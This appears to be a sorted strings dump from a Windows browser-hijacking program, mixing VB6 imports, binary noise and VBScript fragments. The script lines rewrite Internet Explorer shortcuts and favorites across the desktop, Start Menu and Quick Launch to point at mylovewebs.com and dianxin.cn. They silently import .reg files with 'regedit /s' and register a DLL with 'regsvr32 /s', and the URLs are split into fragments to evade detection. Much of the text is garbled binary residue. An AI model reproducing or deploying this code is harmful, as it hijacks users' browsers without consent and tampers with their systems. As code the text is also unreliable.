    f.WriteLine "  31,00,00,00,00,00,a6,3c,8e,0c,10,00,41,44,4d,49,4e,49,7e,31,00,00,32,00,03,\"
    f.WriteLine "  31,32,36,39,33,00,18,00,30,00,35,00,00,00,00,00,8c,3a,cf,23,10,00,fe,94,a5,\"
    f.WriteLine "  31,32,36,39,33,00,18,00,30,00,35,00,00,00,00,00,a5,3c,29,4a,10,00,fe,94,a5,\"
    f.WriteLine "  31,32,36,39,33,00,18,00,30,00,35,00,00,00,00,00,a6,3c,e4,5d,10,00,fe,94,a5,\"
    f.WriteLine "  35,99,38,b7,4c,a0,47,78,a6,83,2a,58,df,11,b1,e0,00,26,18,08,88,87,0e,d2,40,\"
    f.WriteLine "[4]"
    f.WriteLine "  44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,\"
    f.WriteLine "  45,7e,31,00,00,44,00,03,00,04,00,ef,be,8c,3a,da,21,8c,3a,cb,23,14,00,00,00,\"
    f.WriteLine "  45,7e,31,00,00,44,00,03,00,04,00,ef,be,8c,3a,da,21,a2,3c,2c,70,14,00,00,00,\"
    f.WriteLine "  45,7e,31,00,00,44,00,03,00,04,00,ef,be,a5,3c,12,49,a7,3c,f1,48,14,00,00,00,\"
    f.WriteLine "    4a,00,00,00,01,00,00,00,20,07,00,00,a0,0f,00,00,05,00,00,00,62,05,00,00,26,\"
    f.WriteLine "  4a,00,00,00,01,00,00,00,20,07,00,00,a0,0f,00,00,05,00,00,00,62,05,00,00,26,\"
    f.WriteLine "[5]"
    f.WriteLine "  56,00,00,00,01,00,00,00,20,07,00,00,a0,0f,00,00,05,00,00,00,62,05,00,00,26,\"
    f.WriteLine "[6]"
    f.WriteLine "  62,00,00,00,01,00,00,00,a0,06,00,00,a0,0f,00,00,05,00,00,00,22,04,00,00,26,\"
    f.WriteLine "  63,00,00,1c,00,03,00,04,00,ef,be,8c,3a,cc,23,8c,3a,cf,23,14,00,00,00,fe,94,\"
    f.WriteLine "  63,00,00,1c,00,03,00,04,00,ef,be,a2,3c,00,70,a6,3c,e4,5d,14,00,00,00,fe,94,\"
    f.WriteLine "  63,00,00,1c,00,03,00,04,00,ef,be,a5,3c,29,4a,a7,3c,33,44,14,00,00,00,fe,94,\"
    f.WriteLine "  63,32,30,31,30,30,35,30,32,32,31,76,63,62,00,08,ff,f6,b7,27,38,41,4d,8d,f3,\"
    f.WriteLine "  65,ca,82,46,00,00,00,00"
    f.WriteLine "  68,6f,73,74,78,70,33,2d,34,36,37,36,38,30,00,08,ff,f6,b7,27,38,41,4d,8d,f3,\"
    f.WriteLine "  6e,00,69,00,73,00,74,00,72,00,61,00,74,00,6f,00,72,00,00,00,18,00,56,00,31,\"
    f.WriteLine "[7]"
    f.WriteLine "  79,2d,36,36,79,6c,70,32,36,32,64,66,36,75,00,0e,d2,40,80,be,ba,3a,40,a5,d7,\"
    f.WriteLine "[8]"
    f.WriteLine "  80,be,ba,3a,40,a5,d7,35,99,38,b7,4c,a0,47,78,a6,83,2a,58,df,11,b1,e0,00,26,\"
    f.WriteLine "[9]"
    f.WriteLine "  a5,63,00,00,14,00,00,00,60,00,00,00,03,00,00,a0,58,00,00,00,00,00,00,00,67,\"
    f.WriteLine "  a5,63,00,00,14,00,00,00,60,00,00,00,03,00,00,a0,58,00,00,00,00,00,00,00,68,\"
    f.WriteLine "  a5,63,00,00,14,00,00,00,60,00,00,00,03,00,00,a0,58,00,00,00,00,00,00,00,70,\"
    f.WriteLine "  aa,00,5b,43,83,10,00,00,00,00,00,00,00,01,e0,32,f4,01,00,00,00"
    f.WriteLine "  aa,00,5b,43,83,22,00,1c,00,08,00,00,00,06,00,00,00,01,00,00,00,00,00,00,00,\"
    f.WriteLine "  af,bb,9f,a2,00,00,00,00"
    f.WriteLine "  b1,3f,ca,8e,86"
    f.WriteLine """{B580CF65-E151-49C3-B73F-70B13FCA8E86}""=hex:65,cf,80,b5,51,e1,c3,49,b7,3f,70,\"
    f.WriteLine "  b7,27,38,41,4d,8d,f3,17,a7,2f,9d,10,1c,92,a9,ac,9d,ce,58,df,11,a8,ce,00,1e,\"
    f.WriteLine "  b7,27,38,41,4d,8d,f3,17,a7,2f,9d,10,1c,dd,0c,5a,86,1a,27,de,11,b2,8a,86,62,\"
    f.WriteLine "BASEURL=" & linkUrl
    f.WriteLine "  c9,01,5a,ac,06,68,27,bb,c9,01,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,\"
    f.WriteLine "  ca,01,18,bf,0f,fd,11,ed,ca,01,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,\"
    f.WriteLine "  ca,01,9e,d1,0e,c2,33,ec,ca,01,00,00,00,00,00,00,00,00,01,00,00,00,00,00,00,\"
    f.WriteLine "[DEFAULT]"
    f.WriteLine "DialogCurrentTab=1"
    f.WriteLine """{F2CF5485-4E02-4F68-819C-B92DE9277049}""=hex:85,54,cf,f2,02,4e,68,4f,81,9c,b9,\"
    f.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]"
    f.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Explorer]"
    f.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser]"
    f.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]"
    f.WriteLine "IDList="
    f.WriteLine "[InternetShortcut]"
    f.WriteLine """ITBar7Layout""=hex:13,00,00,00,00,00,00,00,00,00,00,00,30,00,00,00,14,00,00,00,\"
    f.WriteLine """ITBarLayout""=hex:11,00,00,00,5c,00,00,00,00,00,00,00,24,00,00,00,1b,00,00,00,\"
    f.WriteLine """ITBarLayout""=hex:11,00,00,00,5c,00,00,00,00,00,00,00,34,00,00,00,1b,00,00,00,\"
    f.WriteLine """ITBarLayout""=hex:11,00,00,00,5c,00,00,00,00,00,00,00,34,00,00,00,1f,00,00,00,\"
    f.WriteLine """LinksFolderName""=""
    f.WriteLine """Locked""=dword:00000001"
    f.WriteLine "picture_name="
    f.WriteLine "picture_name=1"
    f.WriteLine "picture_name=3"
    f.WriteLine "picture_name=4"
    f.WriteLine "picture_name=5"
    f.WriteLine "picture_name=6"
    f.WriteLine "picture_name=7"
    f.WriteLine "Prop3=19,2"
    f.WriteLine "Prop3=19,2"    
    f.WriteLine "Prop3=19,2"	
    f.WriteLine "[SdPreviousState]"
    f.WriteLine "SDShow=1"
    f.WriteLine """ShowDiscussionButton""=""no"""
    f.WriteLine """ShowDiscussionButton""=""Yes"""
    f.WriteLine "SidebarCurrentTab=2"
    f.WriteLine "SidebarShow=1"
    f.WriteLine "state=1"
    f.WriteLine "title=
    f.WriteLine "title="
    f.WriteLine "title=Google
    f.WriteLine "url="
    f.WriteLine "url=http://www.dianxin.cn/webStyle/wangshanggouwu.html"
    f.WriteLine "url=http://www.mylovewebs.com/api/baidu/index.htm"
    f.WriteLine "url=http://www.mylovewebs.com/api/dianying/index.htm"
    f.WriteLine "url=http://www.mylovewebs.com/api/google/index.htm"
    f.WriteLine "url=http://www.mylovewebs.com/api/index/index.htm"
    f.WriteLine "url=http://www.mylovewebs.com/api/taobao/index.htm"
    f.WriteLine "url=http://www.mylovewebs.com/api/xiaoshuo/index.htm"
    f.WriteLine "url=http://www.mylovewebs.com?ie"
    f.WriteLine "URL=" & linkUrl
    f.WriteLine "Windows Registry Editor Version 5.00"
GetClassNameA
GetClassNameWindowHwnd
GetDomainUrl
GetFindWindowHwnd
GetIndexWindowHwnd
GetIndexWindowHwnds
GetMac
GetModuleFileNameExA
):GetParameter
GetPathExeCount
GetProcAddress
GetProcessPathByProcessID
GetReadNode
GetReadNodeLength
GetRegValue
GetResFile
GetTickCount
GetUrlType
GetWindow
GetWindowTextA
GetWinText
GetZiWin
gfffffffffvdnt3333333333DUDU~t
GsC;Bs
GsDRFs
{Gs?|Gs
Gs_]Hs
(&H)"""
HexToStr
hGsbrIs
H,	HoO
?HKEY_CURRP
hKeyStr
hMkzzx}}rr}}ss{{{xxzocPB11AA
HssnGs
HssnGs*aHs
\I\5Spf\{
id,-Wm
ieframe.dll
    ieLinkPath = allUsersPcDesktopPath & "\" & linkName & ".url"
    ieLinkPath = "C:\Documents and Settings\" & Environ("USERNAME") & "\Favorites\
    ieLinkPath = "C:\Documents and Settings\" & Environ("USERNAME") & "\Favorites\" & linkName & ".url"
    ie_temp_path=BROWSER_PATH
    If data="" or instr(dataHome,url)=0 Then
    If data="" Then
    If data="" Then '
        If (fso.FileExists(BROWSER_PATH)) Then     
            If InStr(myName, ".lnk") <> 0 Then
    If linkName = "" Or linkUrl = "" Then
    if (not fso.FileExists(dll_path)) and (fso.FileExists(move_path)) then 
                if oShellLink.Arguments <> url then '
            if oShellLink.Arguments <> url then '
    if oShellLink.Arguments <> url then '
    if tips_count>5 then
+i.n:c
        index=0
            index=index+1
Install
    Install
InstallForm
InternetSetOptionA
IObjectWithSite
IObjectWithSite_GetSite
IObjectWithSite_SetSite
IObjectWithSiteTLB
Is4uIs
IsExeNameBeing
IsPathExe
IsRegOk
IsRegValue
]IstjGs
isXmlReadOk
ITBrDM
JdTab=2MW
jt:l_4
Jusvr#	\
kernel32
kernel32.dll
KERNEL32.DLL
KillPathExe
k& `tc
laidsb]<
$:'ld	X(	jW H
\" & linkName & ".url"
    lnkPath(1) = pcDesktopPath
    lnkPath(2) = quickLaunch
    lnkPath(3) = programs
    lnkPath(4) = startMenu
    lnkPath(5) = allUsersPcDesktopPath
    lnkPath(6) = allUsersPrograms
    lnkPath(7) = allUsersStartMenu
LoadAllBrowserHwnd
LoadLibraryA
LoadXml
LOCAL_MACHINJ
    loop
    loop    
lpClassName
lpWindowName
{%m @%
    maxthonLinkPath = "C:\Program Files\Maxthon2\SharedAccount\Config\MxSpeedDial\SpeedDial.ini"
MethCallEngine
MkZXff.b27
    move_path="{move_path}"
MSVBVM60.DLL
  Mult
            myName = directory + "\" + flie.name
N0iIEa
NadWebBrowser
    Next
        Next
        Next        
nodeName
OFTWAREu
[{*ogK
oleaut32.dll
On Error Resume Next
On Error Resume Next 
OoGsh;Is
OpenProcess
                    oShellLink.Arguments = url '
                oShellLink.Arguments = url '
        oShellLink.Arguments = url '
                    oShellLink.Save            
                oShellLink.Save            
        oShellLink.Save            
                oShellLink.TargetPath = BROWSER_PATH '
        oShellLink.TargetPath = BROWSER_PATH '
p62[a6@
Pa\foWdy
parameterName
_PATH^
pE5CBF2
postWebBrowser
"postWebBrowser
;p)P1 T
p_pk#=
ppvObj
Private Const BROWSER_PATH = "C:\Program Files\Internet Explorer\iexplore.exe" '
ProcCallEngine
process
Process
Process32First
Process32Next
psapi.dll
psPath
PublicData
Public Function CreateLnk(linkName,linkUrl)   
Public Function CreateLnk(url)   
Public Function IeIndex(url)   
Public Function IeLink(linkName,linkUrl)   
Public Function IeSearch()   
Public Function ReplaceBrowserLink(url)    
Public Function SetBhoo()  
Public Function ShowIeLink()   
PublicWork
Q	5bt|||yyvv22qnpmww~y~tuu~~JGgYT	--,,
    quickLaunch = wshShell.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch" '
Q	U.Run
Qvod64
Qvod64.dll
QvodAdBlocker
QvodAdBlockerWWW
QvodBlock
QvodBlockWWW
(&R)]"
(&R)\Command]"
ReadyState
RegCloseKey
RegCreateKeyA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyA
    regPath = Environ("windir") & "\search.reg"
    regPath = Environ("windir") & "\SIndex.reg"
    regPath = "{regPath}"
    regPathSeven = Environ("windir") & "\ShowIeLinkIe7.reg"
    regPathSix = Environ("windir") & "\ShowIeLinkIe6.reg"
RegQueryValueExA
RegSetValueExA
REG_SZ
@.reloc
rIs1hIs
Root%\
SafeArrayGetDim
safemon
{Save+Y
'S:dLdw
SendMessageA
    Set Environ = ws.Environment("process") 
    Set Environ = WshShell.Environment("process") 
        Set f1=fso.CreateTextFile(regPath, True)
    Set f1=fso.CreateTextFile(regPath, True)
        Set fc = f.Files 
        Set f = fs.GetFolder(directory)
    Set f=fso.CreateTextFile(ieLinkPath, True)
    Set f=fso.CreateTextFile(maxthonLinkPath, True)
    Set f=fso.CreateTextFile(regPathSeven, True)
    Set f=fso.CreateTextFile(regPathSix, True)
        Set f = fso.GetFolder(directory)
SetFileAttributesA
    Set file=fso.getfile(ieLinkPath)
                Set file=fso.getfile(myName)
            Set file=fso.getfile(strDesktop)
    Set file=fso.getfile(strDesktop)
    Set f  = Nothing
        Set fs = CreateObject("Scripting.FileSystemObject")
                Set fso = CreateObject("Scripting.FileSystemObject")
        Set fso = CreateObject("Scripting.FileSystemObject")
    Set fso = CreateObject("Scripting.FileSystemObject")
                Set fso  = Nothing
        Set fso  = Nothing
    Set fso  = Nothing
	    Set fso  = Nothing
	Set fso  = Nothing
    set fso=wscript.createobject("scripting.filesystemobject")
    Set OperationRegistry=WScript.CreateObject("WScript.Shell") 
                Set oShellLink  = Nothing                
            Set oShellLink = Nothing
    Set oShellLink = Nothing
                Set oShellLink = wshShell.CreateShortcut(myName)
            Set oShellLink = wshShell.CreateShortcut(strDesktop)
    Set oShellLink = wshShell.CreateShortcut(strDesktop)
    Set oShellLink = wshShell.CreateShortcut(strDesktop)        
SetRegValue
SetUrl
SetWinText
    Set ws = CreateObject("WScript.Shell") 
    Set wshShell = CreateObject("Wscript.shell")
    Set wshShell = CreateObject("Wscript.Shell")
        Set WshShell= CreateObject("WScript.Shell") 
    Set WshShell = CreateObject("WScript.Shell") 
	      Set WshShell= CreateObject("WScript.Shell") 
	    Set WshShell= CreateObject("WScript.Shell") 
	Set WshShell= CreateObject("WScript.Shell") 
        Set wshShell = Nothing
        Set WshShell  = Nothing
        Set WshShell  = Nothing  
    Set WshShell  = Nothing
    Set WshShell  = Nothing    
SHDocVw
SHDocVwCtl
SHDocVwCtl.WebBrowser
	\shdocvwj{5 
shell32.dll
ShellAboutA
ShellExecuteA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
showText
snBROW
=sRIObjectWithSite
sSO)SD
    startup = wshShell.SpecialFolders("AllUsersStartup") '
statTime
stdole2.tlbWWW
            strDesktop = allUsersPcDesktopPath + "\Internet Explorer.lnk"
    strDesktop = allUsersPrograms + "\Internet Explorer.lnk"    
    strDesktop = allUsersStartMenu + "\Internet Explorer.lnk"
    strDesktop = quickLaunch + "\Internet Explorer.lnk"
strNodes
StrToHex
Sub Main()
    taobao_guid="{taobao_guid}"
TerminateProcess
!This program cannot be run in DOS mode.
    tips_count=0
        tips_count=tips_count+1
}T`X4p
txtTips
u c,4q
",url & "api/baidu/index.htm")
",url & "api/cqonline/index.htm")
",url & "api/dianying/index.htm")
",url & "api/google/index.htm")
",url & "api/index/index.htm")
",url & "api/shangji/index.htm")
",url & "api/taobao/index.htm")
",url & "api/xiaoshuo/index.htm")
",url & "api/youxi/index.htm")
URLEncode
    url="http://" & "ww" & "w.di" & "an" & "xin.cn?Lnk"    
    url="http://www." & "my" & "lovew" & "ebs.com/"
urlHwnds
urlTimer
user32
%UUUUUUUUUUUUD~e/
vb6chs.dll
VBA6.DLL
__vbaAryDestruct
__vbaAryMove
__vbaCastObj
__vbaChkstk
__vbaErrorOverflow
__vbaExceptHandler
__vbaFPException
__vbaFPInt
__vbaFpUI1
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaHresultCheckObj
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLenBstr
__vbaObjIs
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaRedimPreserve
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrMove
__vbaStrVarMove
__vbaUbound
__vbaUnkVar
__vbaVar2Vec
__vbaVarLateMemSt
__vbaVarMove
__vbaVarSetVar
__vbaVarTstEq
__vbaVarVargNofree
\VBBHO.tlb
VBBHO.tlbW
VBForm
VbFormVbe
vfwwwwwwwwmga
VirtualProtect
VVVVVVVVVVVV
VVVVVVVVVVVV 
VVVVVVVVVVVVB
VVVVVVVVVVVVG?
VVVVVVVVVVVVU	
webBrowser
"webBrowser
WebBrowser
window_hwnd
WindowHwnd
wininet.dll
?W?^?o?y?
    wscript.sleep 1800000
        wscript.sleep 36000      
        wscript.sleep 50000
	      WshShell.Run "regedit /s " & regPath
	    WshShell.Run "regedit /s " & regPath
	WshShell.Run "regedit /s " & regPath
	WshShell.Run "regedit /s " & regPathSeven
	WshShell.Run "regedit /s " & regPathSix
	      WshShell.Run "regsvr32.exe /s " & dll_path
wTD03-9D1F-ABD3BE1DCC4E
x:11,|
x`5-8*-F
xmlPath
XPTPSW
Y|m9db9#f
ZFyJ,T,e
Zombie_GetTypeInfo
Zombie_GetTypeInfoCount